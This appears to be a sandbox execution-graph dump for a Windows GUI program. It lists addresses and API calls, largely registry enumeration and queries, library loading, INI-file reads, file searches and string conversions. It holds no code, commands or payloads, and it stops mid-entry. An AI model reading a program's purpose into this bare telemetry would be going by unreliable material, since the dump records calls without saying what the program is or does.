                                            execution_graph 34116 40fc40 70 API calls 34290 403640 21 API calls 34117 427fa4 42 API calls 34291 412e43 _endthreadex 34292 425115 76 API calls __fprintf_l 34293 43fe40 133 API calls 34120 425115 83 API calls __fprintf_l 34121 401445 memcpy memcpy DialogBoxParamA 34122 440c40 34 API calls 33253 444c4a 33272 444e38 33253->33272 33255 444c56 GetModuleHandleA 33256 444c68 __set_app_type __p__fmode __p__commode 33255->33256 33258 444cfa 33256->33258 33259 444d02 __setusermatherr 33258->33259 33260 444d0e 33258->33260 33259->33260 33273 444e22 _controlfp 33260->33273 33262 444d13 _initterm __getmainargs _initterm 33263 444d6a GetStartupInfoA 33262->33263 33265 444d9e GetModuleHandleA 33263->33265 33274 40cf44 33265->33274 33269 444dcf _cexit 33271 444e04 33269->33271 33270 444dc8 exit 33270->33269 33272->33255 33273->33262 33325 404a99 LoadLibraryA 33274->33325 33276 40cf60 33277 40cf64 33276->33277 33332 410d0e 33276->33332 33277->33269 33277->33270 33279 40cf6f 33336 40ccd7 ??2@YAPAXI 33279->33336 33281 40cf9b 33350 407cbc 33281->33350 33286 40cfc4 33368 409825 memset 33286->33368 33287 40cfd8 33373 4096f4 memset 33287->33373 33292 40d181 ??3@YAXPAX 33294 40d1b3 33292->33294 33295 40d19f DeleteObject 33292->33295 33293 407e30 _strcmpi 33296 40cfee 33293->33296 33397 407948 ??3@YAXPAX ??3@YAXPAX 33294->33397 33295->33294 33298 40cff2 RegDeleteKeyA 33296->33298 33299 40d007 EnumResourceTypesA 33296->33299 33298->33292 33301 40d047 33299->33301 33302 40d02f MessageBoxA 33299->33302 33300 40d1c4 33398 4080d4 ??3@YAXPAX 33300->33398 33304 40d0a0 CoInitialize 33301->33304 33378 40ce70 33301->33378 33302->33292 33395 40cc26 strncat memset RegisterClassA CreateWindowExA 33304->33395 33306 40d1cd 33399 407948 ??3@YAXPAX ??3@YAXPAX 33306->33399 33308 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33396 40c256 PostMessageA 33308->33396 33312 40d061 ??3@YAXPAX 33312->33294 33315 40d084 DeleteObject 33312->33315 33313 40d09e 33313->33304 33315->33294 33317 40d0f9 GetMessageA 33318 40d17b 33317->33318 33319 40d10d 33317->33319 33318->33292 33320 40d113 TranslateAccelerator 33319->33320 33322 40d145 IsDialogMessage 33319->33322 33323 40d139 IsDialogMessage 33319->33323 33320->33319 33321 40d16d GetMessageA 33320->33321 33321->33318 33321->33320 33322->33321 33324 40d157 TranslateMessage DispatchMessageA 33322->33324 33323->33321 33323->33322 33324->33321 33326 404ac4 GetProcAddress 33325->33326 33328 404ae8 33325->33328 33327 404add FreeLibrary 33326->33327 33329 404ad4 33326->33329 33327->33328 33330 404b13 33328->33330 33331 404afc MessageBoxA 33328->33331 33329->33327 33330->33276 33331->33276 33333 410d17 LoadLibraryA 33332->33333 33334 410d3c 33332->33334 33333->33334 33335 410d2b GetProcAddress 33333->33335 33334->33279 33335->33334 33337 40cd08 ??2@YAPAXI 33336->33337 33339 40cd26 33337->33339 33340 40cd2d 33337->33340 33407 404025 6 API calls 33339->33407 33342 40cd66 33340->33342 33343 40cd59 DeleteObject 33340->33343 33400 407088 33342->33400 33343->33342 33345 40cd6b 33403 4019b5 33345->33403 33348 4019b5 strncat 33349 40cdbf _mbscpy 33348->33349 33349->33281 33409 407948 ??3@YAXPAX ??3@YAXPAX 33350->33409 33354 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33361 407cf7 33354->33361 33355 407ddc 33363 407e04 33355->33363 33422 407a1f 33355->33422 33357 407d7a ??3@YAXPAX 33357->33361 33361->33354 33361->33355 33361->33357 33361->33363 33413 40796e 7 API calls 33361->33413 33414 406f30 33361->33414 33410 407a55 33363->33410 33364 407e30 33365 407e38 33364->33365 33366 407e57 33364->33366 33365->33366 33367 407e41 _strcmpi 33365->33367 33366->33286 33366->33287 33367->33365 33367->33366 33428 4097ff 33368->33428 33370 409854 33433 409731 33370->33433 33374 4097ff 3 API calls 33373->33374 33375 409723 33374->33375 33453 40966c 33375->33453 33467 4023b2 33378->33467 33384 40ced3 33556 40cdda 7 API calls 33384->33556 33385 40cece 33389 40cf3f 33385->33389 33508 40c3d0 memset GetModuleFileNameA strrchr 33385->33508 33389->33312 33389->33313 33391 40ceed 33535 40affa 33391->33535 33395->33308 33396->33317 33397->33300 33398->33306 33399->33277 33408 406fc7 memset _mbscpy 33400->33408 33402 40709f CreateFontIndirectA 33402->33345 33404 4019e1 33403->33404 33405 4019c2 strncat 33404->33405 33406 4019e5 memset LoadIconA 33404->33406 33405->33404 33406->33348 33407->33340 33408->33402 33409->33361 33411 407a65 33410->33411 33412 407a5b ??3@YAXPAX 33410->33412 33411->33364 33412->33411 33413->33361 33415 406f37 malloc 33414->33415 33416 406f7d 33414->33416 33418 406f73 33415->33418 33419 406f58 33415->33419 33416->33361 33418->33361 33420 406f6c ??3@YAXPAX 33419->33420 33421 406f5c memcpy 33419->33421 33420->33418 33421->33420 33423 407a38 33422->33423 33424 407a2d ??3@YAXPAX 33422->33424 33426 406f30 3 API calls 33423->33426 33425 407a43 33424->33425 33427 40796e 7 API calls 33425->33427 33426->33425 33427->33363 33444 406f96 GetModuleFileNameA 33428->33444 33430 409805 strrchr 33431 409814 33430->33431 33432 409817 _mbscat 33430->33432 33431->33432 33432->33370 33445 44b090 33433->33445 33438 40930c 3 API calls 33439 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33438->33439 33440 4097c5 LoadStringA 33439->33440 33443 4097db 33440->33443 33442 4097f3 33442->33292 33443->33440 33443->33442 33452 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33443->33452 33444->33430 33446 40973e _mbscpy _mbscpy 33445->33446 33447 40930c 33446->33447 33448 44b090 33447->33448 33449 409319 memset GetPrivateProfileStringA 33448->33449 33450 409374 33449->33450 33451 409364 WritePrivateProfileStringA 33449->33451 33450->33438 33451->33450 33452->33443 33463 406f81 GetFileAttributesA 33453->33463 33455 409675 33456 4096ee 33455->33456 33457 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33455->33457 33456->33293 33464 409278 GetPrivateProfileStringA 33457->33464 33459 4096c9 33465 409278 GetPrivateProfileStringA 33459->33465 33461 4096da 33466 409278 GetPrivateProfileStringA 33461->33466 33463->33455 33464->33459 33465->33461 33466->33456 33558 409c1c 33467->33558 33470 401e69 memset 33597 410dbb 33470->33597 33473 401ec2 33627 4070e3 strlen _mbscat _mbscpy _mbscat 33473->33627 33474 401ed4 33612 406f81 GetFileAttributesA 33474->33612 33477 401ee6 strlen strlen 33479 401f15 33477->33479 33480 401f28 33477->33480 33628 4070e3 strlen _mbscat _mbscpy _mbscat 33479->33628 33613 406f81 GetFileAttributesA 33480->33613 33483 401f35 33614 401c31 33483->33614 33486 401f75 33626 410a9c RegOpenKeyExA 33486->33626 33487 401c31 7 API calls 33487->33486 33489 401f91 33490 402187 33489->33490 33491 401f9c memset 33489->33491 33493 402195 ExpandEnvironmentStringsA 33490->33493 33494 4021a8 _strcmpi 33490->33494 33629 410b62 RegEnumKeyExA 33491->33629 33638 406f81 GetFileAttributesA 33493->33638 33494->33384 33494->33385 33496 40217e RegCloseKey 33496->33490 33497 401fd9 atoi 33498 401fef memset memset sprintf 33497->33498 33506 401fc9 33497->33506 33630 410b1e 33498->33630 33501 402165 33501->33496 33502 406f81 GetFileAttributesA 33502->33506 33503 402076 memset memset strlen strlen 33503->33506 33504 4020dd strlen strlen 33504->33506 33505 4070e3 strlen _mbscat _mbscpy _mbscat 33505->33506 33506->33496 33506->33497 33506->33501 33506->33502 33506->33503 33506->33504 33506->33505 33507 402167 _mbscpy 33506->33507 33637 410b62 RegEnumKeyExA 33506->33637 33507->33496 33509 40c422 33508->33509 33510 40c425 _mbscat _mbscpy _mbscpy 33508->33510 33509->33510 33511 40c49d 33510->33511 33512 40c512 33511->33512 33513 40c502 GetWindowPlacement 33511->33513 33514 40c538 33512->33514 33659 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33512->33659 33513->33512 33652 409b31 33514->33652 33518 40ba28 33519 40ba87 33518->33519 33523 40ba3c 33518->33523 33662 406c62 LoadCursorA SetCursor 33519->33662 33521 40ba8c 33663 4107f1 33521->33663 33666 403c16 33521->33666 33742 410a9c RegOpenKeyExA 33521->33742 33743 404734 33521->33743 33751 404785 33521->33751 33522 40ba43 _mbsicmp 33522->33523 33523->33519 33523->33522 33754 40b5e5 10 API calls 33523->33754 33524 40baa0 33525 407e30 _strcmpi 33524->33525 33528 40bab0 33525->33528 33526 40bafa SetCursor 33526->33391 33528->33526 33529 40baf1 qsort 33528->33529 33529->33526 34109 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33535->34109 33537 40b00e 33538 40b016 33537->33538 33539 40b01f GetStdHandle 33537->33539 34110 406d1a CreateFileA 33538->34110 33541 40b01c 33539->33541 33542 40b035 33541->33542 33543 40b12d 33541->33543 34111 406c62 LoadCursorA SetCursor 33542->34111 34115 406d77 9 API calls 33543->34115 33546 40b136 33557 40c580 28 API calls 33546->33557 33547 40b087 33554 40b0a1 33547->33554 34113 40a699 12 API calls 33547->34113 33548 40b042 33548->33547 33548->33554 34112 40a57c strlen WriteFile 33548->34112 33551 40b0d6 33552 40b116 CloseHandle 33551->33552 33553 40b11f SetCursor 33551->33553 33552->33553 33553->33546 33554->33551 34114 406d77 9 API calls 33554->34114 33556->33385 33557->33389 33570 409a32 33558->33570 33561 409c80 memcpy memcpy 33562 409cda 33561->33562 33562->33561 33563 408db6 12 API calls 33562->33563 33564 409d18 ??2@YAPAXI ??2@YAPAXI 33562->33564 33563->33562 33565 409d54 ??2@YAPAXI 33564->33565 33566 409d8b 33564->33566 33565->33566 33580 409b9c 33566->33580 33569 4023c1 33569->33470 33571 409a44 33570->33571 33572 409a3d ??3@YAXPAX 33570->33572 33573 409a52 33571->33573 33574 409a4b ??3@YAXPAX 33571->33574 33572->33571 33575 409a5c ??3@YAXPAX 33573->33575 33577 409a63 33573->33577 33574->33573 33575->33577 33576 409a83 ??2@YAPAXI ??2@YAPAXI 33576->33561 33577->33576 33578 409a73 ??3@YAXPAX 33577->33578 33579 409a7c ??3@YAXPAX 33577->33579 33578->33579 33579->33576 33581 407a55 ??3@YAXPAX 33580->33581 33582 409ba5 33581->33582 33583 407a55 ??3@YAXPAX 33582->33583 33584 409bad 33583->33584 33585 407a55 ??3@YAXPAX 33584->33585 33586 409bb5 33585->33586 33587 407a55 ??3@YAXPAX 33586->33587 33588 409bbd 33587->33588 33589 407a1f 4 API calls 33588->33589 33590 409bd0 33589->33590 33591 407a1f 4 API calls 33590->33591 33592 409bda 33591->33592 33593 407a1f 4 API calls 33592->33593 33594 409be4 33593->33594 33595 407a1f 4 API calls 33594->33595 33596 409bee 33595->33596 33596->33569 33598 410d0e 2 API calls 33597->33598 33599 410dca 33598->33599 33600 410dfd memset 33599->33600 33639 4070ae 33599->33639 33601 410e1d 33600->33601 33642 410a9c RegOpenKeyExA 33601->33642 33604 410e4a 33605 410e7f _mbscpy 33604->33605 33643 410d3d _mbscpy 33604->33643 33607 401e9e strlen strlen 33605->33607 33607->33473 33607->33474 33609 410e5b 33644 410add RegQueryValueExA 33609->33644 33611 410e73 RegCloseKey 33611->33605 33612->33477 33613->33483 33645 410a9c RegOpenKeyExA 33614->33645 33616 401c4c 33617 401cad 33616->33617 33646 410add RegQueryValueExA 33616->33646 33617->33486 33617->33487 33619 401c6a 33620 401c71 strchr 33619->33620 33621 401ca4 RegCloseKey 33619->33621 33620->33621 33622 401c85 strchr 33620->33622 33621->33617 33622->33621 33623 401c94 33622->33623 33647 406f06 strlen 33623->33647 33625 401ca1 33625->33621 33626->33489 33627->33474 33628->33480 33629->33506 33650 410a9c RegOpenKeyExA 33630->33650 33632 410b34 33633 410b5d 33632->33633 33651 410add RegQueryValueExA 33632->33651 33633->33506 33635 410b4c RegCloseKey 33635->33633 33637->33506 33638->33494 33640 4070bd GetVersionExA 33639->33640 33641 4070ce 33639->33641 33640->33641 33641->33600 33641->33607 33642->33604 33643->33609 33644->33611 33645->33616 33646->33619 33648 406f17 33647->33648 33649 406f1a memcpy 33647->33649 33648->33649 33649->33625 33650->33632 33651->33635 33653 409b40 33652->33653 33655 409b4e 33652->33655 33660 409901 memset SendMessageA 33653->33660 33656 409b99 33655->33656 33657 409b8b 33655->33657 33656->33518 33661 409868 SendMessageA 33657->33661 33659->33514 33660->33655 33661->33656 33662->33521 33664 410807 33663->33664 33665 4107fc FreeLibrary 33663->33665 33664->33524 33665->33664 33667 4107f1 FreeLibrary 33666->33667 33668 403c30 LoadLibraryA 33667->33668 33669 403c74 33668->33669 33670 403c44 GetProcAddress 33668->33670 33672 4107f1 FreeLibrary 33669->33672 33670->33669 33671 403c5e 33670->33671 33671->33669 33676 403c6b 33671->33676 33673 403c7b 33672->33673 33674 404734 3 API calls 33673->33674 33675 403c86 33674->33675 33755 4036e5 33675->33755 33676->33673 33679 4036e5 23 API calls 33680 403c9a 33679->33680 33681 4036e5 23 API calls 33680->33681 33682 403ca4 33681->33682 33683 4036e5 23 API calls 33682->33683 33684 403cae 33683->33684 33765 4085d2 33684->33765 33692 403ce5 33693 403cf7 33692->33693 33946 402bd1 39 API calls 33692->33946 33811 410a9c RegOpenKeyExA 33693->33811 33696 403d0a 33697 403d1c 33696->33697 33947 402bd1 39 API calls 33696->33947 33812 402c5d 33697->33812 33701 4070ae GetVersionExA 33702 403d31 33701->33702 33830 410a9c RegOpenKeyExA 33702->33830 33704 403d51 33705 403d61 33704->33705 33948 402b22 46 API calls 33704->33948 33831 410a9c RegOpenKeyExA 33705->33831 33708 403d87 33709 403d97 33708->33709 33949 402b22 46 API calls 33708->33949 33832 410a9c RegOpenKeyExA 33709->33832 33712 403dbd 33713 403dcd 33712->33713 33950 402b22 46 API calls 33712->33950 33833 410808 33713->33833 33717 404785 FreeLibrary 33718 403de8 33717->33718 33837 402fdb 33718->33837 33721 402fdb 34 API calls 33722 403e00 33721->33722 33853 4032b7 33722->33853 33731 403e3b 33733 403e73 33731->33733 33734 403e46 _mbscpy 33731->33734 33900 40fb00 33733->33900 33952 40f334 334 API calls 33734->33952 33742->33524 33744 404785 FreeLibrary 33743->33744 33745 40473b LoadLibraryA 33744->33745 33746 40474c GetProcAddress 33745->33746 33749 40476e 33745->33749 33747 404764 33746->33747 33746->33749 33747->33749 33748 404781 33748->33524 33749->33748 33750 404785 FreeLibrary 33749->33750 33750->33748 33752 4047a3 33751->33752 33753 404799 FreeLibrary 33751->33753 33752->33524 33753->33752 33754->33523 33756 4037c5 33755->33756 33757 4036fb 33755->33757 33756->33679 33757->33756 33758 403716 strchr 33757->33758 33758->33756 33759 403730 33758->33759 33953 4021b6 memset 33759->33953 33761 40373f _mbscpy _mbscpy strlen 33762 4037a4 _mbscpy 33761->33762 33763 403789 sprintf 33761->33763 33954 4023e5 16 API calls 33762->33954 33763->33762 33766 4085e2 33765->33766 33955 4082cd 11 API calls 33766->33955 33770 408600 33771 403cba 33770->33771 33772 40860b memset 33770->33772 33783 40821d 33771->33783 33958 410b62 RegEnumKeyExA 33772->33958 33774 4086d2 RegCloseKey 33774->33771 33776 408637 33776->33774 33777 40865c memset 33776->33777 33959 410a9c RegOpenKeyExA 33776->33959 33962 410b62 RegEnumKeyExA 33776->33962 33960 410add RegQueryValueExA 33777->33960 33780 408694 33961 40848b 10 API calls 33780->33961 33782 4086ab RegCloseKey 33782->33776 33963 410a9c RegOpenKeyExA 33783->33963 33785 40823f 33786 403cc6 33785->33786 33787 408246 memset 33785->33787 33795 4086e0 33786->33795 33964 410b62 RegEnumKeyExA 33787->33964 33789 4082bf RegCloseKey 33789->33786 33791 40826f 33791->33789 33965 410a9c RegOpenKeyExA 33791->33965 33966 4080ed 11 API calls 33791->33966 33967 410b62 RegEnumKeyExA 33791->33967 33794 4082a2 RegCloseKey 33794->33791 33968 4045db 33795->33968 33797 4088ef 33976 404656 33797->33976 33801 408737 wcslen 33801->33797 33807 40876a 33801->33807 33802 40877a _wcsncoll 33802->33807 33804 404734 3 API calls 33804->33807 33805 404785 FreeLibrary 33805->33807 33806 408812 memset 33806->33807 33808 40883c memcpy wcschr 33806->33808 33807->33797 33807->33802 33807->33804 33807->33805 33807->33806 33807->33808 33809 4088c3 LocalFree 33807->33809 33979 40466b _mbscpy 33807->33979 33808->33807 33809->33807 33810 410a9c RegOpenKeyExA 33810->33692 33811->33696 33980 410a9c RegOpenKeyExA 33812->33980 33814 402c7a 33815 402da5 33814->33815 33816 402c87 memset 33814->33816 33815->33701 33981 410b62 RegEnumKeyExA 33816->33981 33818 402d9c RegCloseKey 33818->33815 33819 410b1e 3 API calls 33820 402ce4 memset sprintf 33819->33820 33982 410a9c RegOpenKeyExA 33820->33982 33822 402d28 33823 402d3a sprintf 33822->33823 33983 402bd1 39 API calls 33822->33983 33984 410a9c RegOpenKeyExA 33823->33984 33828 402cb2 33828->33818 33828->33819 33829 402d9a 33828->33829 33985 402bd1 39 API calls 33828->33985 33986 410b62 RegEnumKeyExA 33828->33986 33829->33818 33830->33704 33831->33708 33832->33712 33834 410816 33833->33834 33835 4107f1 FreeLibrary 33834->33835 33836 403ddd 33835->33836 33836->33717 33987 410a9c RegOpenKeyExA 33837->33987 33839 402ff9 33840 403006 memset 33839->33840 33841 40312c 33839->33841 33988 410b62 RegEnumKeyExA 33840->33988 33841->33721 33843 403122 RegCloseKey 33843->33841 33844 410b1e 3 API calls 33845 403058 memset sprintf 33844->33845 33989 410a9c RegOpenKeyExA 33845->33989 33847 4030a2 memset 33990 410b62 RegEnumKeyExA 33847->33990 33849 410b62 RegEnumKeyExA 33852 403033 33849->33852 33850 4030f9 RegCloseKey 33850->33852 33852->33843 33852->33844 33852->33847 33852->33849 33852->33850 33991 402db3 26 API calls 33852->33991 33854 4032d5 33853->33854 33855 4033a9 33853->33855 33992 4021b6 memset 33854->33992 33868 4034e4 memset memset 33855->33868 33857 4032e1 33993 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33857->33993 33859 4032ea 33860 4032f8 memset GetPrivateProfileSectionA 33859->33860 33994 4023e5 16 API calls 33859->33994 33860->33855 33865 40332f 33860->33865 33862 40339b strlen 33862->33855 33862->33865 33864 403350 strchr 33864->33865 33865->33855 33865->33862 33995 4021b6 memset 33865->33995 33996 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33865->33996 33997 4023e5 16 API calls 33865->33997 33869 410b1e 3 API calls 33868->33869 33870 40353f 33869->33870 33871 40357f 33870->33871 33872 403546 _mbscpy 33870->33872 33876 403985 33871->33876 33998 406d55 strlen _mbscat 33872->33998 33874 403565 _mbscat 33999 4033f0 19 API calls 33874->33999 34000 40466b _mbscpy 33876->34000 33880 4039aa 33882 4039ff 33880->33882 34001 40f460 memset memset 33880->34001 34022 40f6e2 33880->34022 34038 4038e8 21 API calls 33880->34038 33883 404785 FreeLibrary 33882->33883 33884 403a0b 33883->33884 33885 4037ca memset memset 33884->33885 34046 444551 memset 33885->34046 33887 4038e2 33887->33731 33951 40f334 334 API calls 33887->33951 33890 40382e 33891 406f06 2 API calls 33890->33891 33892 403843 33891->33892 33893 406f06 2 API calls 33892->33893 33894 403855 strchr 33893->33894 33895 403884 _mbscpy 33894->33895 33896 403897 strlen 33894->33896 33897 4038bf _mbscpy 33895->33897 33896->33897 33898 4038a4 sprintf 33896->33898 34058 4023e5 16 API calls 33897->34058 33898->33897 33901 44b090 33900->33901 33902 40fb10 RegOpenKeyExA 33901->33902 33903 403e7f 33902->33903 33904 40fb3b RegOpenKeyExA 33902->33904 33914 40f96c 33903->33914 33905 40fb55 RegQueryValueExA 33904->33905 33906 40fc2d RegCloseKey 33904->33906 33907 40fc23 RegCloseKey 33905->33907 33908 40fb84 33905->33908 33906->33903 33907->33906 33909 404734 3 API calls 33908->33909 33910 40fb91 33909->33910 33910->33907 33911 40fc19 LocalFree 33910->33911 33912 40fbdd memcpy memcpy 33910->33912 33911->33907 34063 40f802 11 API calls 33912->34063 33915 4070ae GetVersionExA 33914->33915 33916 40f98d 33915->33916 33917 4045db 7 API calls 33916->33917 33918 40f9a9 33917->33918 33921 40fae6 33918->33921 33922 40fa13 memset WideCharToMultiByte 33918->33922 33919 404656 FreeLibrary 33920 403e85 33919->33920 33926 4442ea memset 33920->33926 33921->33919 33922->33918 33923 40fa43 _strnicmp 33922->33923 33923->33918 33924 40fa5b WideCharToMultiByte 33923->33924 33924->33918 33925 40fa88 WideCharToMultiByte 33924->33925 33925->33918 33927 410dbb 9 API calls 33926->33927 33928 444329 33927->33928 34064 40759e strlen strlen 33928->34064 33933 410dbb 9 API calls 33934 444350 33933->33934 33935 40759e 3 API calls 33934->33935 33936 44435a 33935->33936 33937 444212 65 API calls 33936->33937 33938 444366 memset memset 33937->33938 33939 410b1e 3 API calls 33938->33939 33940 4443b9 ExpandEnvironmentStringsA strlen 33939->33940 33941 4443f4 _strcmpi 33940->33941 33942 4443e5 33940->33942 33943 403e91 33941->33943 33944 44440c 33941->33944 33942->33941 33943->33524 33945 444212 65 API calls 33944->33945 33945->33943 33946->33693 33947->33697 33948->33705 33949->33709 33950->33713 33951->33731 33952->33733 33953->33761 33954->33756 33956 40841c 33955->33956 33957 410a9c RegOpenKeyExA 33956->33957 33957->33770 33958->33776 33959->33776 33960->33780 33961->33782 33962->33776 33963->33785 33964->33791 33965->33791 33966->33794 33967->33791 33969 404656 FreeLibrary 33968->33969 33970 4045e3 LoadLibraryA 33969->33970 33971 404651 33970->33971 33972 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33970->33972 33971->33797 33971->33801 33973 40463d 33972->33973 33974 404643 33973->33974 33975 404656 FreeLibrary 33973->33975 33974->33971 33975->33971 33977 403cd2 33976->33977 33978 40465c FreeLibrary 33976->33978 33977->33810 33978->33977 33979->33807 33980->33814 33981->33828 33982->33822 33983->33823 33984->33828 33985->33828 33986->33828 33987->33839 33988->33852 33989->33852 33990->33852 33991->33852 33992->33857 33993->33859 33994->33860 33995->33864 33996->33865 33997->33865 33998->33874 33999->33871 34000->33880 34039 4078ba 34001->34039 34004 4078ba _mbsnbcat 34005 40f5a3 RegOpenKeyExA 34004->34005 34006 40f5c3 RegQueryValueExA 34005->34006 34007 40f6d9 34005->34007 34008 40f6d0 RegCloseKey 34006->34008 34009 40f5f0 34006->34009 34007->33880 34008->34007 34009->34008 34010 40f675 34009->34010 34043 40466b _mbscpy 34009->34043 34010->34008 34044 4012ee strlen 34010->34044 34012 40f611 34014 404734 3 API calls 34012->34014 34019 40f616 34014->34019 34015 40f69e RegQueryValueExA 34015->34008 34016 40f6c1 34015->34016 34016->34008 34017 40f66a 34018 404785 FreeLibrary 34017->34018 34018->34010 34019->34017 34020 40f661 LocalFree 34019->34020 34021 40f645 memcpy 34019->34021 34020->34017 34021->34020 34045 40466b _mbscpy 34022->34045 34024 40f6fa 34025 4045db 7 API calls 34024->34025 34026 40f708 34025->34026 34027 404734 3 API calls 34026->34027 34032 40f7e2 34026->34032 34033 40f715 34027->34033 34028 404656 FreeLibrary 34029 40f7f1 34028->34029 34030 404785 FreeLibrary 34029->34030 34031 40f7fc 34030->34031 34031->33880 34032->34028 34033->34032 34034 40f797 WideCharToMultiByte 34033->34034 34035 40f7b8 strlen 34034->34035 34036 40f7d9 LocalFree 34034->34036 34035->34036 34037 40f7c8 _mbscpy 34035->34037 34036->34032 34037->34036 34038->33880 34040 4078e6 34039->34040 34041 4078c7 _mbsnbcat 34040->34041 34042 4078ea 34040->34042 34041->34040 34042->34004 34043->34012 34044->34015 34045->34024 34059 410a9c RegOpenKeyExA 34046->34059 34048 40381a 34048->33887 34057 4021b6 memset 34048->34057 34049 44458b 34049->34048 34060 410add RegQueryValueExA 34049->34060 34051 4445a4 34052 4445dc RegCloseKey 34051->34052 34061 410add RegQueryValueExA 34051->34061 34052->34048 34054 4445c1 34054->34052 34062 444879 30 API calls 34054->34062 34056 4445da 34056->34052 34057->33890 34058->33887 34059->34049 34060->34051 34061->34054 34062->34056 34063->33911 34065 4075c9 34064->34065 34066 4075bb _mbscat 34064->34066 34067 444212 34065->34067 34066->34065 34084 407e9d 34067->34084 34070 44424d 34071 444274 34070->34071 34072 444258 34070->34072 34092 407ef8 34070->34092 34073 407e9d 9 API calls 34071->34073 34105 444196 52 API calls 34072->34105 34080 4442a0 34073->34080 34075 407ef8 9 API calls 34075->34080 34076 4442ce 34102 407f90 34076->34102 34080->34075 34080->34076 34082 444212 65 API calls 34080->34082 34106 407e62 strcmp strcmp 34080->34106 34081 407f90 FindClose 34083 4442e4 34081->34083 34082->34080 34083->33933 34085 407f90 FindClose 34084->34085 34086 407eaa 34085->34086 34087 406f06 2 API calls 34086->34087 34088 407ebd strlen strlen 34087->34088 34089 407ee1 34088->34089 34090 407eea 34088->34090 34107 4070e3 strlen _mbscat _mbscpy _mbscat 34089->34107 34090->34070 34093 407f03 FindFirstFileA 34092->34093 34094 407f24 FindNextFileA 34092->34094 34095 407f3f 34093->34095 34096 407f46 strlen strlen 34094->34096 34097 407f3a 34094->34097 34095->34096 34098 407f7f 34095->34098 34096->34098 34099 407f76 34096->34099 34100 407f90 FindClose 34097->34100 34098->34070 34108 4070e3 strlen _mbscat _mbscpy _mbscat 34099->34108 34100->34095 34103 407fa3 34102->34103 34104 407f99 FindClose 34102->34104 34103->34081 34104->34103 34105->34070 34106->34080 34107->34090 34108->34098 34109->33537 34110->33541 34111->33548 34112->33547 34113->33554 34114->33551 34115->33546 34124 411853 RtlInitializeCriticalSection memset 34125 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34299 40a256 13 API calls 34301 432e5b 17 API calls 34303 43fa5a 20 API calls 34127 401060 41 API calls 34306 427260 CloseHandle memset memset 33211 410c68 FindResourceA 33212 410c81 SizeofResource 33211->33212 33213 410cae 33211->33213 33212->33213 33214 410c92 LoadResource 33212->33214 33214->33213 33215 410ca0 LockResource 33214->33215 33215->33213 34308 405e69 14 API calls 34132 433068 15 API calls __fprintf_l 34310 414a6d 18 API calls 34311 43fe6f 134 API calls 34134 424c6d 15 API calls __fprintf_l 34312 426741 19 API calls 34136 440c70 17 API calls 34137 443c71 44 API calls 34140 427c79 24 API calls 34315 416e7e memset __fprintf_l 34144 42800b 47 API calls 34145 425115 85 API calls __fprintf_l 34318 41960c 61 API calls 34146 43f40c 122 API calls __fprintf_l 34149 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34150 43f81a 20 API calls 34152 414c20 memset memset 34153 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34322 414625 18 API calls 34323 404225 modf 34324 403a26 strlen WriteFile 34326 40422a 12 API calls 34330 427632 memset memset memcpy 34331 40ca30 59 API calls 34332 404235 26 API calls 34154 42ec34 61 API calls __fprintf_l 34155 425115 76 API calls __fprintf_l 34333 425115 77 API calls __fprintf_l 34335 44223a 38 API calls 34161 43183c 112 API calls 34336 44b2c5 _onexit __dllonexit 34341 42a6d2 memcpy __allrem 34163 405cda 65 API calls 34349 43fedc 138 API calls 34350 4116e1 16 API calls __fprintf_l 34166 4244e6 19 API calls 34168 42e8e8 127 API calls __fprintf_l 34169 4118ee RtlLeaveCriticalSection 34355 43f6ec 22 API calls 34171 425115 119 API calls __fprintf_l 33201 410cf3 EnumResourceNamesA 34358 4492f0 memcpy memcpy 34360 43fafa 18 API calls 34362 4342f9 15 API calls __fprintf_l 34172 4144fd 19 API calls 34364 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34365 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34368 443a84 _mbscpy 34370 43f681 17 API calls 34175 404487 22 API calls 34372 415e8c 16 API calls __fprintf_l 34179 411893 RtlDeleteCriticalSection __fprintf_l 34180 41a492 42 API calls 34376 403e96 34 API calls 34377 410e98 memset SHGetPathFromIDList SendMessageA 34182 426741 109 API calls __fprintf_l 34183 4344a2 18 API calls 34184 4094a2 10 API calls 34186 4108a4 memcpy UuidFromStringA UuidFromStringA UuidFromStringA memcpy 34380 4116a6 15 API calls __fprintf_l 34381 43f6a4 17 API calls 34382 440aa3 20 API calls 34384 427430 45 API calls 34188 4090b0 7 API calls 34189 4148b0 15 API calls 34191 4118b4 RtlEnterCriticalSection 34192 4014b7 CreateWindowExA 34193 40c8b8 19 API calls 34195 4118bf RtlTryEnterCriticalSection 34389 42434a 18 API calls __fprintf_l 34391 405f53 12 API calls 34203 43f956 59 API calls 34205 40955a 17 API calls 34206 428561 36 API calls 34207 409164 7 API calls 34395 404366 19 API calls 34399 40176c ExitProcess 34402 410777 42 API calls 34212 40dd7b 51 API calls 34213 425d7c 16 API calls __fprintf_l 34404 43f6f0 25 API calls 34405 42db01 22 API calls 34214 412905 15 API calls __fprintf_l 34406 403b04 54 API calls 34407 405f04 SetDlgItemTextA GetDlgItemTextA 34408 44b301 ??3@YAXPAX 34411 4120ea 14 API calls 3 library calls 34412 40bb0a 8 API calls 34414 413f11 strcmp 34218 434110 17 API calls __fprintf_l 34221 425115 108 API calls __fprintf_l 34415 444b11 _onexit 34223 425115 76 API calls __fprintf_l 34226 429d19 10 API calls 34418 444b1f __dllonexit 34419 409f20 _strcmpi 34228 42b927 31 API calls 34422 433f26 19 API calls __fprintf_l 34423 44b323 FreeLibrary 34424 427f25 46 API calls 34425 43ff2b 17 API calls 34426 43fb30 19 API calls 34235 414d36 16 API calls 34237 40ad38 7 API calls 34428 433b38 16 API calls __fprintf_l 34429 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34241 426741 21 API calls 34242 40c5c3 125 API 